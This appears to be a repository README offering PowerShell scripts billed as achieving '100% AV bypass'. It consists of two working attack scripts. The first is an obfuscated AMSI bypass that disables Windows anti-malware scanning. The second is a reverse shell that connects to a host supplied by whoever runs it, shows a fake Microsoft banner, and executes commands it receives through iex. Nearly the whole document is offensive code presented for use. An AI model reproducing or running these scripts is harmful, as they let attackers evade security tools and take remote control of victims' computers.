Powershell scripts with 100% AV bypass

powershell

A list of useful Powershell scripts with 100% AV bypass (At the time of publication).


PSSW100AVB

This is the Powershell Scripts with 100% AV Bypass Repository (PSSW100AVB). A list of useful Powershell scripts with 100% AV bypass (At the time of publication).

Script

#Twitter: @TihanyiNorbert  (No AV detecetion 2021 October)
#Based on the original work of  Matt Graeber @mattifestation 'amsiInitFailed' script.
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
#Twitter: @TihanyiNorbert  (No AV detecetion 2021 october)
#Based on the original nishang Framework written by @nikhil_mitt.
$c = New-Object System.Net.Sockets.TCPClient($args[0],$args[1]);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.`n`n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r  = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()